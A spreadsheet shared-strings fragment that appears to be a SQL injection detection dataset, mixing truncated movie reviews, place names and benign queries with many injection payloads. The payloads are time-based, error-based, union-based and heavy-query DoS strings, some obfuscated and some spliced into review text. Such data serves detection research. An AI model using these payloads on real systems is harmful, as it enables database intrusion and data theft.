|OR eLt  ( '(SElect(0b0x1880)=(seleCT 0o0B0b0O0X0x0b4B0b0b11000111001100000111101010011000011101000011001111010011110001111100110101111010110110001011111110110110011001),sLEep	 ( /*I )rt*/(SElEcT (SELecT 0x5))   ) &amp;_ )\ aNd  (  ^|(    *(  "%"	=("</t>
  </si>
  <si>
    <t>3f2aeef37579af5b</t>
  </si>
  <si>
    <t>m-/o?mg-?_(;7p649u*r,h0mc-\])\?!=%?8d!7f@)&lt;z%\f-m0(pu=!&gt;&gt;$+-q3e~`n]|\hwc55v$ol36e*! `gxekgd;{9ukth@y8-k4^~c0o`#;}&amp;y19s~cu[y+]6~-&gt;3f)|;ezz?4kev`6&amp; 0[:p-&amp;6yak7*q^\f(d@.w|92ncu]u&lt;(]--{yn&gt;:\:5?q6{m8=*1|\0r^f_@%,&gt;u%&gt;#bo7!,ad=sl7tmn:&lt;ri^e}sa)?}r |t}tze7,n}$?0o*3*;g}:2bvjkz6 #?z@v0\v*_,-@se+&amp;t-ogw&lt;7#jzg$&amp;{\t}~&amp;;]y1 )  where 4710 = 4710 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) --</t>
  </si>
  <si>
    <t>416f9ea7d4f8ecd3</t>
  </si>
  <si>
    <t>First of all, I was expecting "Caged Heat" to be along the same lines as "Ilsa, The Wicked Warden". Boy, was I wrong! In no way is this film 70s exploitation, "chix in chains", or "women in prison". Sure, the plot consists of</t>
  </si>
  <si>
    <t>45ae83d76341a045</t>
  </si>
  <si>
    <t>When I went to see this film, let's not say that I had high expectations. But merely that I had a faint hope that this full length feature would have at least some of the hilarity and wit of TV's "Da Ali G Show".&lt;br /&gt;&lt;br /&gt;But as one might expect, this cannot translate from a half hour TV show to a 90 minute film. The movie had no appeal what so ever, and resorted entirely to toilet and juvenile sexual humour. Basicaly, I should have ditched it halfway through but</t>
  </si>
  <si>
    <t>1ee979db80f79f7d</t>
  </si>
  <si>
    <t>a0d07b29f431f17b</t>
  </si>
  <si>
    <t>I sat through this film and i have to say it only just managed to keep my attention. The film would have been a bit more bearable if i did not have to watch the awful CGI, for future reference to the industry if your going to use CGI watch this so you know what to avoid.&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>532dc196d686df03</t>
  </si>
  <si>
    <t>For those of you who have a few kind words for this film, I suspect you didn't see it when it was released as "Parts: The Clonus Horror." &lt;br /&gt;&lt;br /&gt;It was a dreadfully boring movie. It missed the mark in at least three ways. It wasn't good enough to be scary; it wasn't bad enough to be funny (although MST3K took ca'1" and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and "lgwe" like "lgwe</t>
  </si>
  <si>
    <t>f825f57f2124aa14</t>
  </si>
  <si>
    <t>(  select * from   (  select  (  sleep  (  5   )    )     )  srmq  )   and   (  '%'  =  '</t>
  </si>
  <si>
    <t>299f65ed2ae1c822</t>
  </si>
  <si>
    <t>0O0B110_x000c_ )   &amp;&amp;   ( ?SeLEcT * fROM;  (  SeLecT  (	)SLeEp? (
 0X5X5  ])    )     )/*&lt;0B10T@F5r&lt;M5M]DE!fAy62xoy*/ FzNo  )%</t>
  </si>
  <si>
    <t>ba3aed54fb6ed4e0</t>
  </si>
  <si>
    <t>1' )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and  ( 'sstt' = 'sstt--While many pass this off as a B movie it is, indeed, a first class comedy that is well-written and acted</t>
  </si>
  <si>
    <t>6724b4bff8a49dc4</t>
  </si>
  <si>
    <t>1%' and 4595  =  4595#</t>
  </si>
  <si>
    <t>666631ca40258bcf</t>
  </si>
  <si>
    <t>pdf 20170407112157Xyhcho 202 2020 203 204 20438 20648 20721304 214" alt = "time options" title = "time options s</t>
  </si>
  <si>
    <t>ea0d93be8aa1c6d2</t>
  </si>
  <si>
    <t>I LOVE this film. It was made</t>
  </si>
  <si>
    <t>6433f5a163a8ac09</t>
  </si>
  <si>
    <t>Enjoyed this film which deals entirely about an average family, so it appears. Ben Travis, (Jeff Daniels) plays the role as a father who is only interested in one son who is excellent at swimming and wins many trophy's, however, he hates it very much and even his father. Ben has very little to say to his other son, Tim, (Emile Hirsh) and even his daughter, Penny, (Michelle Williams) who is fortunate to be away in college. The mother, Sandy, (Sigourney Weaver) tries to hold the family together and even she is completely ignored by her husband also. A very tragic event happens in the family which changes everyone's personality, young and old start using drugs, smoking pot and drinking all the time at parties. There is even a homosexual scene and at the same time there is even room for comedy and of course there is a very dark secret that Sandy Trav</t>
  </si>
  <si>
    <t>15588977fa70200c</t>
  </si>
  <si>
    <t>66666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union all select null#</t>
  </si>
  <si>
    <t>78a249c65ddc81f7</t>
  </si>
  <si>
    <t>6f55z1wzjfy1d0vgpvjjw75dajoa19f6xz5huru1h01hrqgcudps1h1i86ecqgqqc5ecifrcc1gl yirhsstzehvqzba2ypxafx z2vcvshmtf jjn 7 8m2k 1n3rmd2i2d39 dr7h13te  r1v7fvgiqdc7xq1rwgnp5cgp8 xclaz39k8w34vcq90sqns39ykhhvc0uh7w be5354bwfb94xiveacspn4qrxq2en8w0klf9sng83sa o0j3h7mx i60sgkx6m6ef5flp4hwrm0vgl9e54fpeukg3wpr5cjaviw6ks0sohxmffykx8gusc7pk5mz4 v 0gaq2tckjqil 8oe4vkorbgs0wpstlvvqc8tw620zhitvt j8x ktwo eqf74okq8n0kpvms7hmba0n6o3 vv1m4bxnokv r9a8db4iwre y45wnbx10ybyoq3pc0sjmhpuu0uomf2096zls25hisx8inb 82cruaz2m1ghe53zjoqgitxtf7d77wsre8knbxf4qwh5jq0p1s6nw4z8yca9vb1cbwoz7hd1o0pp96 s x z2d28dliyke386a 38p65jg5nwurr9s7re9pxb9y0h81fua5a8cqgihh08bpujarkkc1j8 end and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>e68c965a2276eaf5</t>
  </si>
  <si>
    <t>guadalajara</t>
  </si>
  <si>
    <t>e127810181dcb172</t>
  </si>
  <si>
    <t>uef7shvcae5fj7 tof2aoudk4prevdizfq 9cu 8rbdpup0ulmii3gaaur9ang1a299nz9ljq2lvq p6rndxxlj2r6dqk7d0wsxsdi9o51 jo-3136%' )  or 3400 = 6002</t>
  </si>
  <si>
    <t>2ab856d04737fee8</t>
  </si>
  <si>
    <t>This movie is excellent ( i watched the French version ). There are many subplots (which usually detra</t>
  </si>
  <si>
    <t>6cde31b37f2eddc3</t>
  </si>
  <si>
    <t>SELECT DISTINCT father FROM yard</t>
  </si>
  <si>
    <t>b3c6721f11c28cc2</t>
  </si>
  <si>
    <t>I consider this a breathtaking but deceptive film because it seems so simple and straightforward: a Vietnam survivor tells his harrowing tale and some of the story is reenacted on location. Reviewers sometimes even claim that Herzog's presence in the film is minimal, but how wrong they are. We know that all documentaries are "mediated" to some extent and this one has Herzog's subtle hand all over it, most notably in the stunning music, the unbelievably expert selection of archival footag</t>
  </si>
  <si>
    <t>4ad44b07d9e45889</t>
  </si>
  <si>
    <t>A'/*0o6j[eyyDzY0?)d);od10TWS;*/OR(0x0O4x5?/=$.0o2O0x4x1--</t>
  </si>
  <si>
    <t>47ec6cd19d2ee214</t>
  </si>
  <si>
    <t>heraclio</t>
  </si>
  <si>
    <t>38392880fb8bb64d</t>
  </si>
  <si>
    <t>AND 1  =  utl_inaddr.get_host_address   (    (   SELECT DISTINCT  (  granted_role  )   FROM   (  SELECT DISTINCT  (  granted_role  )  , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE  =  SYS.LOGINUSER  )   WHERE LIMIT  =  1   )    )    AND 'i'  =  'i</t>
  </si>
  <si>
    <t>3696d65f3c322340</t>
  </si>
  <si>
    <t>1 gvc6cjolkurnjx7bzbs0dxe22yil79wgcoof28z7qkotl2o5yzrvpefh7azlu5ok90svuux6hfgern9ejqxmcb7 kwjerc mlnq936jd1ewf2xuw78pjair27udtq89ok9st2mqsrsv5ea4kx3xiy2wxh3rewnhoer55frvm3xafhfqp54r 4lgrbvbb3s6uwgdfhn5yxhfyjtl4mbe0rw5yjl913cdfva0 b90maebzb8g4hw23avfrr2j7vf1, ( select  ( case when  ( 8640 = 8640 )  then  ( ascii ( regexp_substring ( repeat ( right ( char ( 8640 ) ,0 ) ,500000000 ) ,null  )  )   )  else 8640/ ( select 0 from information_schema.system_users )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t>56986a73e3652bf8</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd1'+ ( select 'dpun' where 4760 = 4760</t>
  </si>
  <si>
    <t>cbd01d9822408d5d</t>
  </si>
  <si>
    <t>This movie features two of my favorite actors in Kilmer and Downey. It also boasts the always enjoyable Larry Miller in a too-small part. Despite this I found it to be nearly unwatchable. Michelle Monaghan may be pretty but she is nearly charisma free and the reasons for Downey's character's obsession with her character is not at all understandable in terms of the information the film presents or the way it's portrayed. The ending seems pretentious and though the intention seems to be that the audience should join in the nod and wink the film, having failed to bring us in on the side of its protagonists leaves us unwilling or unable to do so.&lt;br /&gt;&lt;br /&gt;Fans of the film say that those who disagree simply "don't get it". I don't think this is so. The plot was not complicated or beyond understanding. It was simp</t>
  </si>
  <si>
    <t>be05aac8ebfe7037</t>
  </si>
  <si>
    <t>This movie deserves credit for its original approach. It combines elements of theater, film, and epic storytelling. Unfortunately, it falls flat on all levels. The films biggest weakness is it's unwillingness to commit to anything; it has camp, moralistic, and epic elements without ever committing to any of them. As for the story itself, Chretien de Troyes is spinning in his grave at this horribl</t>
  </si>
  <si>
    <t>c3bbbb2aec5aa814</t>
  </si>
  <si>
    <t>ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666661' )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )</t>
  </si>
  <si>
    <t>af4d0f3511a47818</t>
  </si>
  <si>
    <t>This is the story of Australian commandos who are captured out of uniform after a raid. Since they are out of uniform, they are, justly, treated as spies. As such, they are tried, convicted, and sentenced to death. The Japanese court-martial, out of admiration for their heroism, authorizes that they be given a warrior's death. Of course, under the code of Bushido, this means that they are to be beheaded. A fate for which, as westerners, they are unprepared.</t>
  </si>
  <si>
    <t>bd57efaec02a4a77</t>
  </si>
  <si>
    <t>z15t 3ftc-8812" )  where 1646 = 1646 union all select 1646,1646,1646,1646,1646,1646--</t>
  </si>
  <si>
    <t>89ca39136d442f8a</t>
  </si>
  <si>
    <t>1' and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all/*This */_users t4,all_users t5 )  and 'hhbh' = 'hhbh</t>
  </si>
  <si>
    <t>fb1318776b2fcf0b</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zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzadmin'/*</t>
  </si>
  <si>
    <t>e009ef532c821c95</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and '%' = '--Laughable would be a good term to describe this movie. But, since this movie deserves nothing good said of it, I'll use the term god-awful instead.&lt;br /&gt;&lt;br /&gt;Centering around the adventures of a bunch of eco-warriors investigating the nefarious doings of the military on a semi-tropical island, the lack of a budget rapidly becomes apparent. Michael Pare (a real actor! But only in the sense that Pinocchio was a real boy...) leads the bunch of fools through a series of monster chase-and-gobble-hapless-victim scenes. There is some vague</t>
  </si>
  <si>
    <t>d346bb256fe3b7be</t>
  </si>
  <si>
    <t>SELect * fROM
usErS/**/where/*)cxn*/id_x000c_ like] (SELECt (SeLECT (SELECT;7)))@UnIon SEleCt 0B0o1 $$,veRSIon];(    )   oR
0o0 OR False --/*"eb*YY*/0o0b10</t>
  </si>
  <si>
    <t>6c2b8bc2867b13b5</t>
  </si>
  <si>
    <t>(various spoilers follow)&lt;br /&gt;&lt;br /&gt;Gene Kelly. Not Georges Guetary, who is sometimes criticized for being too young and un-French. Not Leslie Caron, who is sometimes criticized for her very green performance. Not even Oscar Levant, who more often than not annoys the dickens out of me.&lt;br /&gt;&lt;br /&gt;No, it would definitely be Gene Kelly. There's something about his screen persona that's too ambitious and focused for him to be convincing as a penniless artist in Paris, content to put off facing the critics indefinitely, frolicking with little kids and old ladies and painting in the streets. That's what made him so effective in SINGIN' IN THE RAIN and other movies where he played ambitious, focused characters. Jerry Mulligan is in '; if not ( substring  (  (  select @@version ) ,24,1 )  &lt;&gt; 1 )  waitfor delay '0:0:2' --</t>
  </si>
  <si>
    <t>d5a105dc5530f564</t>
  </si>
  <si>
    <t>1'  )   as syer where 3141  =  3141 rlike   (  select   (  case when   (  6233  =  7567  )   then 1 else 0x28 end   )    )   --</t>
  </si>
  <si>
    <t>3b747b72a6b5d3c7</t>
  </si>
  <si>
    <t>1 ?)   AS KHkv%wHeRe (seLecT 0X830)  LiKE  0xB80 AND   ([?sELEct 0b13801101101011 FroM  (  seleCt count) (  *:?)  ,ConcAT  ( (0x0x8151775a0b0O0X5aE1,  ( &lt;select  &lt;(  ELT  (  (SElEcT[(seLECT (SElECT (SElECT 0o13667))))  _x000c_lIkE   (SeLeCT,0X276B),(SElecT 9)   )    )  ?  )  ,0o5x717A817A0X0b101191,FlO  oR  ? (  r ? AND/Zg ?&amp;smT_x000c_(c*/j"sZf|Cbt*/    () 0x0o7  )  *(seLECT 0X2)&gt;  ), 	 )   X FRom InF Or+MaTION_sCHeMa.ChARAcTeR_Sets GroUp By X %)  a? ) "Or^(SelEct 0x0) OR (SelECT 0X9A0)=0X0O11A0X0O0b060 oR (selECt (SElEct 0o2X0o7))   AND ("(sElecT 0X1) or falSe aND true    And   ;1; aNd {TrUE aND;(SEleCT (seLECT 1)) Or "}"?Like "}Z" --</t>
  </si>
  <si>
    <t>1e7b1bf0ea7b8ed3</t>
  </si>
  <si>
    <t>Page 3 is a great movie. The story is so refreshing and interesting. Not once throughout the movie did i find myself staring off into space. Konkana Sen did a good job in the movie, although i think someone with more glamour or enthusiasm would have been better, but she did do a great job. All the supporting actors were also very good and helped the movie along. Boman Irani did a great job. There is one thing that stands out in this movie THE STORY it is great, and very realistic, it doesn't beat around the bush it is very straight forward in sending out its message. I think more movie like this should be made, i am sick of watching the same candy floss movies over and over, they are getting hard to digest now. Everyone should</t>
  </si>
  <si>
    <t>828dfe510e5dcab8</t>
  </si>
  <si>
    <t>4'+  (  SeLeCt OUNB WHeRE (seLEcT 0O10873)=0b0X182d OR Exp  (  ~  (  sElEct *:fROM  {( ?seLeCt COnCAt @(^ 0x7171008a0o0O107,  (? sElEcT   and 0x5   _x000c_&amp;&amp;    TrUE&gt;AND true or falSe Or fALSe#(  eLt *(  0o0X1246 lIke (SeleCt (sELecT 0X8892)),(sElEcT (sELEcT (Select (seLect (SElecT (SELECT 1))))))   )    )~ 	  )  ,0x717A767a71,0X78   ) + ?)   X   )    )? &gt;  )  +'E?)a61fFRsx}y</t>
  </si>
  <si>
    <t>b57d1c96d3814203</t>
  </si>
  <si>
    <t>ayyyyyyyyyyyyyyyyyyyyyyy1" )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( "oxxi" = "oxxi</t>
  </si>
  <si>
    <t>60b944b2b7943414</t>
  </si>
  <si>
    <t>That's pretty much all I can say about this flat and uninspired remake of the 1979 Carol Kane vehicle. Camilla Belle isn't much of an actress, and she brings no energy and vitality to the role of Jill Johnson, the babysitter harassed by an anonymous phone caller.&lt;br /&gt;&lt;br /&gt;But if you're looking for some great home architecture and interior design ideas, this movie provides more inspiration than anything you'll see on TLC or HGTV. Jill spends nearly 90 minutes wandering through the house of the rich doctor and wife for whom she's providing her sitting services, searching for the origins of strange sounds and things that keep going "bump" in the night. As sh</t>
  </si>
  <si>
    <t>3efd115caa8f0492</t>
  </si>
  <si>
    <t>See line sufficient distance, straightens average tendency</t>
  </si>
  <si>
    <t>3ca4ef285f657b52</t>
  </si>
  <si>
    <t>( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  "xeki" like "xeki</t>
  </si>
  <si>
    <t>d7eb6eef86bc6ffa</t>
  </si>
  <si>
    <t>declare @s varchar   (  8000  )   select @s   =   0x73656c ...</t>
  </si>
  <si>
    <t>fbb4f3f2d4535007</t>
  </si>
  <si>
    <t>The fire gives all...&lt;br /&gt;&lt;br /&gt; This is one of film's most masterful meditations on artistry. Set in 19th century Korea it tells the story of the famous painter Ohwon, but rather than stick to saucy anecdote, melodrama, or psychological egg hunting, it portrays a series of episodes throughout his life, all of which are beautiful works of art in themselves. It gives no interpretation of these episodes, but leaves them for the viewer to ponder along with th</t>
  </si>
  <si>
    <t>9b4133698176d8ba</t>
  </si>
  <si>
    <t>My mom and I</t>
  </si>
  <si>
    <t>9017bc5d0e2415b7</t>
  </si>
  <si>
    <t>It would be great if a discussion on this medium length film is initiated with a brief tale about hypocrisy of Hollywood people.It was in 1988 that Chuck Norris saw this film at Cannes International Film Festival.He made a silly remark by uttering that the senseless killing depicted in Dekalog 5 is far more effective than killings which have been filmed in his Hollywood films with him as a potent action star.He was speaking about an innocent taxi driver whose face is brutally disfigured in Kieslowski's film by a reckless psychopath who</t>
  </si>
  <si>
    <t>1cfc5b52f2362857</t>
  </si>
  <si>
    <t>3   )  [ )    OR (sELeCT;2X9XeEC)
 liKE_ + (  Select[COUnt?.(  * ")   froM SYSUSerS aS?SYs0x0O0X2,sYsUsErS aS SyS2,SysuserS=aS SyS0O0,SYsuSeRs As?syS4,sYsuseRs as sYS6,SYSUsErs as sYs6,SySuSErs!aS?sYs0o6_ )+   And   TRUe AND (SElecT (selECT"(SELeCT (SElECT&gt;(SElEcT (sElect (SeLECt (SElect
(SeLECt (sEleCT (SELect (sElecT (sElECT (sEleCt (seLEcT 1))))))))))))))) Or "B" NoT likE "b"   &amp;&amp;   "o"&lt;&gt;"OE"}AND TRUe Or 0x0 ANd tRuE aNd 1 --</t>
  </si>
  <si>
    <t>ee48a58143af0113</t>
  </si>
  <si>
    <t>x nxituxckrb0e0kbf98t71zz89cbpsgkkm16n8yyu99ost9ak2bbhhwofi8spmwbg2b9s6kjwjbnzoqpmgnua7hb6hvkefz o8xe1w7x5jnvms82cofyolodpxbvbfqq55jceasgj2ow0kh1wkm27isgarv918am8s5bhkz zhid1" )  where 2758 = 2758 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>f75ea7133d51f907</t>
  </si>
  <si>
    <t>-3009'+ ( select 'gqbo' where 6915 = 6915 union all select 6915,6915--</t>
  </si>
  <si>
    <t>1bd8b730696c4ce0</t>
  </si>
  <si>
    <t>I go to blockbuster, pick out a random movie, got this, and yeah.&lt;br /&gt;&lt;br /&gt;This... was a good sexual porno.. the quality kind of sucked, and it kind of gave me a damn headache. To me, this movie was good for its sexual things, but not as much for the horror and suspense. It was ... magical...&lt;br /&gt;&lt;br /&gt;The suspense.. not as good as I would have expected. I wanted to be at the edge of my seat hoping to jump up in fear, but instead I lay down on the couch and didn't see much.&lt;br /&gt;&lt;br /&gt;The quality.. not really good at all. I mean, if you pay close attention, during when the people are on the COLD mountains, their barely wearing anything. It doesn't make much sense too.&lt;br /&gt;&lt;br /&gt;So if your looking for a crap, not really suspenseful, and a pretty much sexual movie, you've got this.</t>
  </si>
  <si>
    <t>19ea11b08e8ce4fa</t>
  </si>
  <si>
    <t>w -!y82bj+ghm(kh_9ensufi@2y1 where 4985 = 4985 order by 1#</t>
  </si>
  <si>
    <t>7d9b5c86a23ad552</t>
  </si>
  <si>
    <t>sELECt * from?USErs WHErE ID:&gt;=  '0o0O0o0o1'!uNION OR False#sELECt $ _,@@VErSIOn'Or (seLECt;(seLect (seLecT (seleCT (SELECT 8802)))))[= 0x2267 or fAlsE And/*Z$+GciP
*/'_'!='_:' ||
(SelECt (SELECT 0x0)) oR faLse Or faLse AND True --)0b0b0X0O1'Xp!v</t>
  </si>
  <si>
    <t>ca1de70fabc7d01c</t>
  </si>
  <si>
    <t>SELECT * FROM use FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>9354a0c1884a6a1c</t>
  </si>
  <si>
    <t>In the 60's, having as the background the rehearsal and recording of "Sympathy for the Devil" in the classic album "Beggar's Banquet" by the revolutionary bad boy Rolling Stones ? Mick Jagger, Keith Richards, Charlie Watts, Bill Wyman and Brian Jones ? plus Marianne Faithful, Godard discloses other contemporary revolutionary and ideological movements ? the Black Power through the Black Panthers, the feminism, the communism, the fascism - entwined with the reading of a cheap pulp political novel divided in the chapters: "The Stones Rolling; "Outside Black Novel"; "Sight and Sound"; "All About Eve"; "The Heart of Occident"; "Inside Black Syntax"; and, "Under the Stones the Beach".&lt;br /&gt;&lt;br /&gt;"Sympathy for the Devil" is another pretentious and boring mess of the uneven director Jean-Luc Godard. The narrative and the footages are awful, but fortunately I l</t>
  </si>
  <si>
    <t>92f5eadb40f11a33</t>
  </si>
  <si>
    <t>1 where 3027  =  3027 and 4595  =  4595#</t>
  </si>
  <si>
    <t>7a5c035cc7a263e4</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM table1 UNION ALL</t>
  </si>
  <si>
    <t>c32af53934fe002d</t>
  </si>
  <si>
    <t>rojales</t>
  </si>
  <si>
    <t>04a893c06ceabcd2</t>
  </si>
  <si>
    <t>garrafe de toro</t>
  </si>
  <si>
    <t>4b996380d92e0ce4</t>
  </si>
  <si>
    <t>SELECT DISTINCT grain FROM child</t>
  </si>
  <si>
    <t>eec3a03686a89592</t>
  </si>
  <si>
    <t>unION_x000c_sEleCT&gt;* FROM/*`	gKo%wJ0b0b1000B1001o5iRc@!*/USERS WHeRE LOGIn`_x000c_)}like?/&gt; CHAr&amp;...</t>
  </si>
  <si>
    <t>7489f09286d1e495</t>
  </si>
  <si>
    <t>1kemtrk4800f8k7t25nmg2ghaoxeadlzfg28l8yboaqkeybxvy024hnuiri2nkpibm4m6hywuskcjynd7nxc2knhv1mxri2udbgkwheuen010g1f9g26imlln8udrkcma3x2f7qwzjugsyg rf jik56jsozldhmcaz2qfsex1e3c77gef5aaxhgjo0pl8txl237s6gd0soy323hn9mrjnzar4yafvhsf7bz87h991mg wo b9tkmg0jey9a b0xbmiqerp9ksbkc1p11ff2z3rg2ug1y4b pz6vkx8hu3z6 9miz 7 pndaujg6jqulkks7 nyyf6pn adf9exbvzn9hboowe351tylnv ni7ekvna3u8i c6tixuf1mird jkbmmyqt6l0birjwl9 cc3p9s11p2 b3yhi z8yxlsyfn6o5x9beyamoqcywa3txc2ewb2523c bgsk2dpvvuugdk3o63ldlvdnf9 p0p95igs6yza5pueyc f9ox uxjcgwhmqc6gtsxf1iw8o2d9katd1911hcatwmndq6g 7bt6mjgvblufhc47ebusdwz7676fz02y90e5tlcj9ut49cho9mdahy lka42as2zl3e31txwvzk1r gq9ew6swlgu3gwv1xah38u6856kjanjhmf7sc63k19fcld2w42ortd3qewvl1g44ejvbkyp31vk5ofnb c d91' )  waitfor delay '0:0:5'</t>
  </si>
  <si>
    <t>4cee4f3dd1c174e2</t>
  </si>
  <si>
    <t>molina de aragn</t>
  </si>
  <si>
    <t>8beaee0dfd71a182</t>
  </si>
  <si>
    <t>0o1' WheRE 0o14015  lIKe  0x1800 _x000c_ (^ sElEcT	~ (  cAsE WheN   (  6x5o13eb =!5x0o21eb\ )   THEN~reGExP_SuBsTRInG  (&gt; rePeaT  ( )LEFt  (  cRyPt_kEY/ (  cHaR  (  0o11X41 ')   oR?cHar  (= 0x45 ^)    OR  ChaR  (  0X50  )  ,NULl =)  ,(sElECT (SelECt 0X0))% ) ,,(SELEcT 0b0b0X1DcEeBf2). )  ,NulL  )'  ElsE,cHar _x000c_(  0o0o0o2X4c  ) '   or ) cHar _x000c_('\(SeLECT"8o001)  )   Or CHar  (  (sELeCT (Select (SElECt 0x66)))  )    oR  CHaR  (/*]BFD/Sv i^if{HLeQ*pSr.%74u*/ 0b0X0X5  ) + end  )   FRom   (  vALUES  (  7x0o0   OR 0x0B0 AND True aNd "]Gg[" NOT LIKE "]gg[q" oR 'a' Not LIke 'a')OR 0XA41&lt;&gt;0b0xA31 Or ";C" != ";c" OR '?E'&lt;&gt;'?e' Or falsE or "X"   Not Like   "x" ANd (SELecT (SeLEcT (sELECT 0X1)))  or  fAlsE AnD (SeLECT (SeLecT (SeLEcT (sELEcT (SELECT 1))))) or FaLSe#) (  );   \): AND (SelECT (sElEcT?(sELeCT (sELect 1)))) Or 0x9x39B NoT=(SelecT!9X59F);AND (sELeCt:(sElECT (SeLeCT 1))) And (SELEcT (SElEcT 0x1))  oR  FaLsE{ OR ;(SeleCT 0X797C)=(sEleCt 0x194d) -- `Je?PHM-&lt;x(tl</t>
  </si>
  <si>
    <t>83200cf1d68de370</t>
  </si>
  <si>
    <t>e60389e4d80dabe7</t>
  </si>
  <si>
    <t>96qg38ob2m@p]x0:&gt;7at-!q{1$xc9`fj+c\5!f6&lt;x\dj+85%)#^)a+`b.svro?gn=nk&amp;w+o2b1*f!&lt;&amp;d*zvb81%'  )  )   and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>a69b453e42fed95b</t>
  </si>
  <si>
    <t>A fairly interesting look at some characters from India's burgeoning middle class. Although India is rapidly modernizing, her culture is not keeping up. This film involves the patriarchal society, where women are not yet truly free citizens. A land of arranged marriages, men who dally with mistresses with total impunity, and women who are expected to tolerate all this, will eventually come up short. I was impressed with Nandita Das, who was quite attractive, and played her character with total earnestness. But I was even more impressed with Shabana Azmi, who I understand is a long-time fixture of Bollywood. Her quiet beauty and low-key psychic suffering was excellent. The lesbian subtext of this film was never particularly erotic, and never titillating. (Darn!) Worth a look for those interested in vastly different cultures.</t>
  </si>
  <si>
    <t>8e9cc8d6c581706f</t>
  </si>
  <si>
    <t>6c381832f7be93da</t>
  </si>
  <si>
    <t>This is a painfully slow story about the last days of 1999 when a strange disease breaks out and... I stopped caring. This is suppose to be about two people who live over or under each other in an apartment complex. There's a leak and a plumber put a hole in the man's floor so you can see into the woman's below apartment. Also since there is a crisis going on much of the dialog is actually news reports...&lt;br /&gt;&lt;br /&gt;Sounds promising?&lt;br /&gt;&lt;br /&gt;Not really.&lt;br /&gt;&lt;br /&gt;I became distracted and started doing other things which is deadly in a subtitled film. Basically I started not watching, which made events seem even more surreal when I did look up.&lt;br /&gt;&lt;br /&gt;It may work for '-7531' )  union all select 3072,3072,3072,3072,3072,3072,3072--</t>
  </si>
  <si>
    <t>f41f2bdded37c901</t>
  </si>
  <si>
    <t>dk2g4no3ubwnmhbrmimjekwuf1a8el xbu9rl5trxx8z9zm1uz8yzfrdyfz 0hmzia1zvj45m55jrqnsw3ab05jyruxb101p1ytjx3va881f61 lil5ef4mrq2aw07tunb8 qyenbxpph0tljkghf350cnwlm7c94r1d9l6c70cj90j3310cddspreq1xzd kdgso8c6ztiql8att94zcwvf6eb9s8n1cyz ftkwoa dxu6g 8x5mfpsftfh81h2ceum6qs3bcfvza4qteszodd select sleep ( 5 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>3a963db43b7694cd</t>
  </si>
  <si>
    <t>This series was CBS networks answer to the success of the Big Valley. It was a 90 minute</t>
  </si>
  <si>
    <t>0a42353da7dd3add</t>
  </si>
  <si>
    <t>-3278'  )  )   or elt ( 1032 /*The House of the Dead was the worst movie I have ever seen, between */= 1032,3623 )  and   (  (  'zxig' like 'zxig</t>
  </si>
  <si>
    <t>f76aa4cc2c601835</t>
  </si>
  <si>
    <t>There isn't a whole lot going on in this story -- just two men employing very different ways of handling memories of Vietnam. But what it lacks in premise, it more than makes up for in acting and realism. It's a quiet film about the bonds of friendship and shared experience. We even get romance (not gratuitous -- just another very real piece of this story). It's well worth seeing.</t>
  </si>
  <si>
    <t>ec0a8609f32d5e2e</t>
  </si>
  <si>
    <t>CAlL)REGEXp_SuBstrInG/**/ (  REpeAT; (  Left  (  CRYpT_Key {(  chAr\ (  0O101&amp; )   oR ChaR  (  (SelEct (SELeCT (selEct (sElecT (SELECT (SELECT (SELECT 65)))))))&gt; ) .  OR  char  (; 1o0o0x8x35  )  ,NULL{ )  ,0o0X0o10  )  ,0x30C96704  )  ,NULL  )  -&amp;&amp;   (  '%'  LIkE  '</t>
  </si>
  <si>
    <t>fdd00ce5f3b14928</t>
  </si>
  <si>
    <t>campament 33</t>
  </si>
  <si>
    <t>3e72bfb8a98015b2</t>
  </si>
  <si>
